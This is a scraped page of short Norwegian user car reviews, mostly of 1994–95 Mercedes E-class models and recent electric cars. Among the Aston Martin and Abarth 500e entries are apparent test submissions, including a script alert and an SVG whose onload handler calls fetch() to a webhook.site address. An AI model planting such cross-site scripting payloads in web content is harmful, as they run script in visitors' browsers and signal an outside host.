Vurdert av Mb1234
Mercedes-Benz E-klasse (1995)
Det er en evighetsmaskin.
Mercedes-Benz E-klasse (1995)
Kort oppsummert mener jeg dette er en helt super bil, dette gjelder forsåvidt alle 124 bilene til Mercedes Benz :)
Mercedes-Benz E-klasse (1995)
Mye feil og trøbbel og skyhøyt blandet forbruk (1,4 l/mil). Grei komfort og god plass, men har lagt ut snart 150 000 kr på bilen som knapt har gått 150 000 kr.
Mercedes-Benz E-klasse (1994)
Fantastisk veteranbil. Tiden for å bruke en slik bil som en daily driver er forbi og du får på nåværende tidspunkt kastet etter deg 2010 modeller som er vesentlig bedre utstyrt for å bli kjørt
Mercedes-Benz E-klasse (1994)
Veldig bra bil som er noe av det mest slitesterke som er og få tak i, bare skifte olje og filter kvar 10000km så har du ein problemfri bil
Mercedes-Benz E-klasse (1994)
Beste bil jeg har hatt, topp komfort, billig hold.
Mercedes-Benz E-klasse (1994)
For en bensinbil som nå har gått 390.000 så er jeg veldig fornøyd
Mercedes-Benz E-klasse (1994)
Behagelig bil å kjøre
Mercedes-Benz E-klasse (1994)
Eu godkjent for 2 nye år, går og går bare man fyller tanken og skifter olje og filter hver 10000km. Med en innkjøpspris på 4000kr er jeg jo sikret 75% tilbake i vrakpant, billige deler hvis man t
Mercedes-Benz E-klasse (1994)
Fra 1994 modellen ble E flyttet foran motorbetegnelsen. CE ble naturligvis tatt bort. Korrekt modell-betegnelse er derfor E320 coupe. C-124 er den meget vakre coupe-utgave av sedan-modellen W-124 som
Mercedes-Benz E-klasse (1994)
Kvalitet og kjøreglede. MB på sitt beste.
Mercedes-Benz E-klasse (1994)
Verdens beste, mest driftssikre bil med suveren fremkommelighet. Fantastisk byggekvalitet!
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km